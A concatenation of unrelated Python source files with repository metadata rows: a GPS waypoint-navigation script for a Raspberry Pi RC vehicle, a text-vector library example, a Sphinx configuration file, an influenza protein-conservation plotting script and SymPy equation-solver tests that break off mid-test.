compass = hmc5883l(gauss = 4.7, declination = (-7,13))
# read in waypoints
wps = []
wplist = open(wpfile,'r')
for line in wplist:
coord = line.split(",")
wps.append([float(coord[0]),float(coord[1])])
wplist.close()
# open logfile
f = open(logfile,'a')
# init steering / throttle
servo = PWM.Servo(pulse_incr_us=1)
servo.set_servo(steering,1500)
#servo.set_servo(throttle,1500)
def blinkLED(n):
# blink LED on/off n number of times
# LED is on/off for 0.5/0.2 seconds
i = 0
while i <= n:
GPIO.output(readyLED,1)
time.sleep(0.5)
GPIO.output(readyLED,0)
time.sleep(0.2)
i += 1
def getDegrees(dms,nw):
# convert GPS in dddmm.mmmm format to dd.dddd
if (int(dms[0:1]) != 0):
dms = str(0) + dms
D = int(dms[0:3])
M = float(dms[3:])
#S = float(dms[5:])
DD = D + float(M)/60 #+ float(S)/3600
if (nw == "S" or nw == "W"): DD *= -1
return float(DD)
def getLocation():
# read serial port and parse out GPS lat/long/compass/heading info
# return a list of found values
GPS = [0, 1, 2, 3, 4]
GPSFound = 0
while not GPSFound:
NMEAline = serialport.readline()
NMEAdata = NMEAline.split(',')
if (NMEAdata[0] == "$GPRMC"):
# make sure we have GPS lock
if NMEAdata[2] == "V": continue
GPS[0] = round(getDegrees(NMEAdata[3],NMEAdata[4]),6) # lat
GPS[1] = NMEAdata[4] # n/s
GPS[2] = round(getDegrees(NMEAdata[5],NMEAdata[6]),6) # long
GPS[3] = NMEAdata[6] # e/w
GPS[4] = NMEAdata[8] # heading
GPSFound = 1
return GPS
def getBearing(lat1, long1, lat2, long2):
long1, lat1, long2, lat2 = map(radians, [long1, lat1, long2, lat2])
dLon = long2 - long1
y = sin(dLon) * cos(lat2)
x = cos(lat1) * sin(lat2) \
- sin(lat1) * cos(lat2) * cos(dLon)
b = round(degrees(atan2(y, x)))
b = b + 360 if b < 0 else b
return b
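# Haversine great-circle distance: 3961 mi approximates the Earth's radius,
# and the result is converted from miles to feet for the waypoint check.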
def getDistance(lat1, long1, lat2, long2):
lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])
dlon = long2 - long1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
d = 3961 * c
d = round(d * 5280,6) # convert distance to feet
print ('Distance: ' + str(d))
return d
def changeDirection(course):
# change rc steering to match course angle
steerAng = (round(course / 3.5) * 50) + 1500
servo.set_servo(steering,steerAng)
def main():
GPIO.output(readyLED,1)
while True:
if (GPIO.input(goButton)):
# get ready
blinkLED(3)
# go
#servo.set_servo(throttle,1600)
# time of run
tor = str(time.strftime("%d%m%Y")) + str(time.strftime("%H%M%S"))
# set loop count
n = 0
for wp in wps:
wpLat = wp[0]
wpLong = wp[1]
distance = GPSaccuracy
while distance >= GPSaccuracy:
start = int(round(time.time() * 1000))
GPS = getLocation()
myLat = GPS[0]
myLong = GPS[2]
bearing = getBearing(myLat,myLong,wpLat,wpLong)
heading = compass.heading() + cAdjust
course = bearing - heading
while course > 0:
if (course >= 180):
course -= 360
if (course <= -180):
course +=360
# correct for max turn capability
if (course > 35):
course = 35
if (course < -35):
course = -35
changeDirection(course)
heading = compass.heading() + cAdjust
course = bearing - heading
# -----------------------
# ---- output to log
# -----------------------
end = int(round(time.time() * 1000))
lduration = (end - start)
# -----------------------
# --- output to xbee
# -----------------------
output = str(n) + ' || ' + str(myLat) + ' || ' + str(myLong) + ' || ' + \
str(wp) + ' || ' + str(bearing) + ' || ' + str(distance) + ' || ' + \
str(heading) + ' || ' + str(course) + ' || ' + str(lduration) + '\r'
#xbee.write(output)
# ---- header
# tor,loop,lat,long,waypoint,bearing,distance,heading,course,loop duration
                    output = str(tor) + ',' + str(n) + ',' + str(myLat) + ',' + str(myLong) + ',' + \
                             str(wp) + ',' + str(bearing) + ',' + str(distance) + ',' + \
                             str(heading) + ',' + str(course) + ',' + str(lduration) + '\n'
                    f.write(output)
n += 1
distance = getDistance(myLat,myLong,wpLat,wpLong)
f.close()
# stop
#servo.set_servo(throttle,1500)
if __name__=="__main__":
main()
| klinstifen/rpi.mar13 | mar13.py | Python | lgpl-3.0 | 6,451 | 0.014106 |
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
# can be used to compare documents. The word count in a document is normalized
# between 0.0-1.0 so that shorter documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms of a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".
s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""
# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print
# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):
#import os, codecs
#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
# "badger", "bear", "dog", "dolphin", "lion", "parakeet",
# "rabbit", "shark", "sparrow", "tiger", "wolf"):
# s = w.search(q, cached=True)
# s = s.plaintext()
# print os.path.join("corpus2", q+".txt")
# f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
# f.write(s)
# f.close()
# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print
# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print
# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
print feature, weight
# Document vectors can be bundled into a Model (next example).
| krishna11888/ai | third_party/pattern/examples/05-vector/01-document.py | Python | gpl-2.0 | 3,205 | 0.007488 |
# -*- coding: utf-8 -*-
#
# Core documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 12:49:48 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.autohttp.flask'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Eliza'
copyright = u'2016, Jens Schaa'
author = u'Jens Schaa'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('../eliza'))
import version
version = '.'.join(str(x) for x in version.__version__)
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Coredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Eliza.tex', u'Eliza Documentation',
u'Jens Schaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Eliza', u'Eliza Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Eliza', u'Eliza Documentation',
author, 'Eliza', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| redvox/Eliza | docs/conf.py | Python | apache-2.0 | 9,460 | 0.006237 |
# Copyright (C) 2012 by Eka A. Kurniawan
# eka.a.kurniawan(ta)gmail(tod)com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Tested on:
# - Python 2.7.3
# - NumPy 1.6.2
# - MatPlotLib 1.1.1
import numpy as np
import matplotlib.pyplot as plot
files = [['H1N1 - Avian - protein_conservation.txt', 'H1N1 - Avian'],
['H1N1 - Human - protein 1a_conservation.txt', 'H1N1 - Human 1'],
['H1N1 - Human - protein 1b_conservation.txt', 'H1N1 - Human 2'],
['H1N1 - Human - protein 2a_conservation.txt', 'H1N1 - Human 3'],
['H1N1 - Human - protein 2b_conservation.txt', 'H1N1 - Human 4'],
['H1N1 - Human - protein 3a_conservation.txt', 'H1N1 - Human 5'],
['H1N1 - Human - protein 3b_conservation.txt', 'H1N1 - Human 6'],
['H1N1 - Swine - protein_conservation.txt', 'H1N1 - Swine'],
['H3N2 - Avian - protein_conservation.txt', 'H3N2 - Avian'],
['H3N2 - Human - protein 1_conservation.txt', 'H3N2 - Human 1'],
['H3N2 - Human - protein 2_conservation.txt', 'H3N2 - Human 2'],
['H3N2 - Human - protein 3_conservation.txt', 'H3N2 - Human 3'],
['H3N2 - Swine - protein_conservation.txt', 'H3N2 - Swine'],
['H5N1 - Avian - protein_conservation.txt', 'H5N1 - Avian'],
['H5N1 - Human - protein_conservation.txt', 'H5N1 - Human'],
['H5N1 - Swine - protein_conservation.txt', 'H5N1 - Swine']]
conservations = []
totalFile = len(files)
for file in files:
inFile = open(file[0], 'r')
conservations.append(np.array(inFile.read().split(',')[:-1], \
dtype = np.float))
inFile.close()
plot.boxplot([np.asarray(cs) for cs in conservations])
plot.title('Conservation Box Plot of Different Viruses')
plot.ylabel('Score (0 to 11)')
plot.xticks(np.arange(totalFile + 1), [''] + [file[1] for file in files], \
rotation = -90)
plot.show()
| ekaakurniawan/Bioinformatics-Tools | plot_conservation/plot_conservation.py | Python | gpl-2.0 | 2,539 | 0.002363 |
from sympy import (Matrix, Symbol, solve, exp, log, cos, acos, Rational, Eq,
sqrt, oo, LambertW, pi, I, sin, asin, Function, diff, Derivative, symbols,
S, sympify, var, simplify, Integral, sstr, Wild, solve_linear, Interval,
And, Or, Lt, Gt, Assume, Q, re, im, expand, zoo)
from sympy.solvers import solve_linear_system, solve_linear_system_LU,dsolve,\
tsolve, solve_undetermined_coeffs
from sympy.solvers.solvers import guess_solve_strategy, GS_POLY, GS_POLY_CV_1, GS_POLY_CV_2,\
GS_TRANSCENDENTAL, GS_RATIONAL, GS_RATIONAL_CV_1
from sympy.utilities.pytest import XFAIL, raises
from sympy.abc import x
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_swap_back():
# A solution comes back from solve even though it shouldn't be: f(x) is
# in the solution's Integral as the upper limit. When solve is fixed this
# test should be removed. For now, since there are ode's that come back
# with these sorts of solutions, the swap_back feature is performed in
# solve and tested here.
# This appears to be fixed - the equation is not solved.
x = Symbol('x')
f = Function('f')
raises(NotImplementedError, "solve(Eq(log(f(x)), Integral(x, (x, 1, f(x)))), f(x))")
def test_guess_poly():
"""
See solvers.guess_solve_strategy
"""
x, y, a = symbols('x,y,a')
# polynomial equations
assert guess_solve_strategy( S(4), x ) == GS_POLY
assert guess_solve_strategy( x, x ) == GS_POLY
assert guess_solve_strategy( x + a, x ) == GS_POLY
assert guess_solve_strategy( 2*x, x ) == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1,4), x) == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) == GS_POLY
assert guess_solve_strategy( x*y + y, x ) == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) == GS_POLY
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), x) == GS_POLY
def test_guess_poly_cv():
x, y = symbols('x,y')
# polynomial equations via a change of variable
assert guess_solve_strategy( x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( x**Rational(1,3) + x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) == GS_POLY_CV_1
# polynomial equation multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
x, y = symbols('x,y')
assert guess_solve_strategy( (x+1)/(x**2 + 2), x) == GS_RATIONAL
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), y) == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (x**Rational(1,2) + 1)/(x**Rational(1,3) + x**Rational(1,2) + 1), x ) \
== GS_RATIONAL_CV_1
def test_guess_transcendental():
x, y, a, b = symbols('x,y,a,b')
#transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x)-y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( exp(x) + exp(-x) - y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x-10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x+10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(a*x**b-y, x) == GS_TRANSCENDENTAL
def test_solve_args():
x, y = symbols('x,y')
#implicit symbol to solve for
assert set(int(tmp) for tmp in solve(x**2-4)) == set([2,-2])
assert solve([x+y-3,x-y-5]) == {x: 4, y: -1}
#no symbol to solve for
assert solve(42) == []
assert solve([1,2]) == None
#multiple symbols
assert solve(x+y-3,[x,y]) == {x: [3 - y], y: [3 - x]}
#symbol is not a symbol or function
raises(TypeError, "solve(x**2-pi, pi)")
def test_solve_polynomial1():
x, y, a = symbols('x,y,a')
assert solve(3*x-2, x) == [Rational(2,3)]
assert solve(Eq(3*x, 2), x) == [Rational(2,3)]
assert solve(x**2-1, x) in [[-1, 1], [1, -1]]
assert solve(Eq(x**2, 1), x) in [[-1, 1], [1, -1]]
assert solve( x - y**3, x) == [y**3]
assert sorted(solve( x - y**3, y)) == sorted([
(-x**Rational(1,3))/2 + I*sqrt(3)*x**Rational(1,3)/2,
x**Rational(1,3),
(-x**Rational(1,3))/2 - I*sqrt(3)*x**Rational(1,3)/2,
])
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{ y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
solution = {y: S.Zero, x: S.Zero}
assert solve((x-y, x+y), x, y ) == solution
assert solve((x-y, x+y), (x, y)) == solution
assert solve((x-y, x+y), [x, y]) == solution
assert solve( x**3 - 15*x - 4, x) == [-2 + 3**Rational(1,2),
4,
-2 - 3**Rational(1,2) ]
assert sorted(solve((x**2 - 1)**2 - a, x)) == \
sorted([(1 + a**S.Half)**S.Half, -(1 + a**S.Half)**S.Half,
(1 - a**S.Half)**S.Half, -(1 - a**S.Half)**S.Half])
def test_solve_polynomial2():
x = Symbol('x')
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
    Test solving equations that can be converted to a polynomial equation
using the change of variable y -> x**Rational(p, q)
"""
x = Symbol('x')
assert solve( x**Rational(1,2) - 1, x) == [1]
assert solve( x**Rational(1,2) - 2, x) == [4]
assert solve( x**Rational(1,4) - 2, x) == [16]
assert solve( x**Rational(1,3) - 3, x) == [27]
ans = solve(x**Rational(1,2)+x**Rational(1,3)+x**Rational(1,4),x)
assert set([NS(w, n=2) for w in ans]) == \
set(['0.010', '-9.5 + 2.8*I', '0', '-9.5 - 2.8*I'])
def test_solve_polynomial_cv_1b():
x, a = symbols('x a')
assert set(solve(4*x*(1 - a*x**(S(1)/2)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
    Test solving equations that can be converted to a polynomial equation
    by multiplying both sides of the equation by x**m
"""
x = Symbol('x')
assert solve(x + 1/x - 1, x) in \
[[ Rational(1,2) + I*sqrt(3)/2, Rational(1,2) - I*sqrt(3)/2],
[ Rational(1,2) - I*sqrt(3)/2, Rational(1,2) + I*sqrt(3)/2]]
def test_solve_rational():
"""Test solve for rational functions"""
x, y, a, b = symbols('x,y,a,b')
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_linear_system():
x, y, z, t, n = symbols('x,y,z,t,n')
assert solve([x-1, x-y, x-2*y, y-1], [x,y]) is None
assert solve([x-1, x-y, x-2*y, x-1], [x,y]) is None
assert solve([x-1, x-1, x-y, x-2*y], [x,y]) is None
assert solve([x+5*y-2, -3*x+6*y-15], x, y) == {x: -3, y: 1}
M = Matrix([[0,0,n*(n+1),(n+1)**2,0],
[n+1,n+1,-2*n-1,-(n+1),0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{y: 0, z: -t*(1 + n)/n, x: -t*(1 + n)/n}
def test_linear_systemLU():
x, y, z, n = symbols('x,y,z,n')
M = Matrix([[1,2,0,1],[1,3,2*n,1],[4,-1,n**2,1]])
assert solve_linear_system_LU(M, [x,y,z]) == {z: -3/(n**2+18*n),
x: 1-12*n/(n**2+18*n),
y: 6*n/(n**2+18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
a, b = symbols('a,b')
x, y, z = symbols('x,y,z')
assert solve(exp(x)-3, x) == [log(3)]
assert solve((a*x+b)*(exp(x)-3), x) == [-b/a, log(3)]
assert solve(cos(x)-y, x) == [acos(y)]
assert solve(2*cos(x)-y,x)== [acos(y/2)]
raises(NotImplementedError, "solve(Eq(cos(x), sin(x)), x)")
# XXX in the following test, log(2*y + 2*...) should -> log(2) + log(y +...)
assert solve(exp(x) + exp(-x) - y, x) == [
-log(4) + log(2*y + 2*(-4 + y**2)**Rational(1,2)),
-log(4) + log(2*y - 2*(-4 + y**2)**Rational(1,2))
]
assert solve(exp(x)-3, x) == [log(3)]
assert solve(Eq(exp(x), 3), x) == [log(3)]
assert solve(log(x)-3, x) == [exp(3)]
assert solve(sqrt(3*x)-4, x) == [Rational(16,3)]
assert solve(3**(x+2), x) == [zoo]
assert solve(3**(2-x), x) == [zoo]
assert solve(4*3**(5*x+2)-7, x) == [(-log(4) - 2*log(3) + log(7))/(5*log(3))]
assert solve(x+2**x, x) == [-LambertW(log(2))/log(2)]
assert solve(3*x+5+2**(-5*x+3), x) in \
[[-Rational(5,3) + LambertW(-10240*2**Rational(1,3)*log(2)/3)/(5*log(2))],\
[(-25*log(2) + 3*LambertW(-10240*2**(Rational(1, 3))*log(2)/3))/(15*log(2))]]
assert solve(5*x-1+3*exp(2-7*x), x) == \
[Rational(1,5) + LambertW(-21*exp(Rational(3,5))/5)/7]
assert solve(2*x+5+log(3*x-2), x) == \
[Rational(2,3) + LambertW(2*exp(-Rational(19,3))/3)/2]
assert solve(3*x+log(4*x), x) == [LambertW(Rational(3,4))/3]
assert solve((2*x+8)*(8+exp(x)), x) == [-4, log(8) + pi*I]
assert solve(2*exp(3*x+4)-3, x) in [ [-Rational(4,3)+log(Rational(3,2))/3],\
[Rational(-4, 3) - log(2)/3 + log(3)/3]]
assert solve(2*log(3*x+4)-3, x) == [(exp(Rational(3,2))-4)/3]
assert solve(exp(x)+1, x) == [pi*I]
assert solve(x**2 - 2**x, x) == [2]
assert solve(x**3 - 3**x, x) == [-3/log(3)*LambertW(-log(3)/3)]
A = -7*2**Rational(4, 5)*6**Rational(1, 5)*log(7)/10
B = -7*3**Rational(1, 5)*log(7)/5
result = solve(2*(3*x+4)**5 - 6*7**(3*x+9), x)
assert len(result) == 1 and expand(result[0]) in [
Rational(-4, 3) - 5/log(7)/3*LambertW(A),
Rational(-4, 3) - 5/log(7)/3*LambertW(B),
]
assert solve(z*cos(x)-y, x) == [acos(y/z)]
assert solve(z*cos(2*x)-y, x) == [acos(y/z)/2]
assert solve(z*cos(sin(x))-y, x) == [asin(acos(y/z))]
assert solve(z*cos(x), x) == [acos(0)]
# issue #1409
assert solve(y - b*x/(a+x), x) in [[-a*y/(y - b)], [a*y/(b - y)]]
assert solve(y - b*exp(a/x), x) == [a/(-log(b) + log(y))]
# issue #1408
assert solve(y-b/(1+a*x), x) in [[(b - y)/(a*y)], [-((y - b)/(a*y))]]
# issue #1407
assert solve(y-a*x**b , x) == [(y/a)**(1/b)]
# issue #1406
assert solve(z**x - y, x) == [log(y)/log(z)]
# issue #1405
assert solve(2**x - 10, x) == [log(10)/log(2)]
def test_solve_for_functions_derivatives():
t = Symbol('t')
x = Function('x')(t)
y = Function('y')(t)
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
soln = solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y)
assert soln == { y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x-1, x) == [1]
assert solve(3*x-2, x) == [Rational(2,3)]
soln = solve([a11*x.diff(t) + a12*y.diff(t) - b1, a21*x.diff(t) +
a22*y.diff(t) - b2], x.diff(t), y.diff(t))
assert soln == { y.diff(t) : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x.diff(t) : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x.diff(t)-1, x.diff(t)) == [1]
assert solve(3*x.diff(t)-2, x.diff(t)) == [Rational(2,3)]
eqns = set((3*x - 1, 2*y-4))
assert solve(eqns, set((x,y))) == { x : Rational(1, 3), y: 2 }
x = Symbol('x')
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
assert solve(F.diff(x), diff(f(x), x)) == [(2 - x)/f(x)]
# Mixed cased with a Symbol and a Function
x = Symbol('x')
y = Function('y')(t)
soln = solve([a11*x + a12*y.diff(t) - b1, a21*x +
a22*y.diff(t) - b2], x, y.diff(t))
assert soln == { y.diff(t) : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
def test_issue626():
x = Symbol("x")
f = Function("f")
F = x**2 + f(x)**2 - 4*x - 1
e = F.diff(x)
assert solve(e, f(x).diff(x)) == [(2-x)/f(x)]
def test_solve_linear():
x, y = symbols('x y')
w = Wild('w')
assert solve_linear(x, x) == (0, 1)
assert solve_linear(x, y - 2*x) in [(x, y/3), (y, 3*x)]
assert solve_linear(x, y - 2*x, exclude=[x]) ==(y, 3*x)
assert solve_linear(3*x - y, 0) in [(x, y/3), (y, 3*x)]
assert solve_linear(3*x - y, 0, [x]) == (x, y/3)
assert solve_linear(3*x - y, 0, [y]) == (y, 3*x)
assert solve_linear(x**2/y, 1) == (y, x**2)
assert solve_linear(w, x) in [(w, x), (x, w)]
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y) == \
(y, -2 - cos(x)**2 - sin(x)**2)
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y, x=[x]) == \
(2 + y + cos(x)**2 + sin(x)**2, 1)
def test_solve_undetermined_coeffs():
a, b, c, x = symbols('a, b, c, x')
assert solve_undetermined_coeffs(a*x**2 + b*x**2 + b*x + 2*c*x + c + 1, [a, b, c], x) == \
{a: -2, b: 2, c: -1}
# Test that rational functions work
assert solve_undetermined_coeffs(a/x + b/(x + 1) - (2*x + 1)/(x**2 + x), [a, b], x) == \
{a: 1, b: 1}
# Test cancellation in rational functions
assert solve_undetermined_coeffs(((c + 1)*a*x**2 + (c + 1)*b*x**2 +
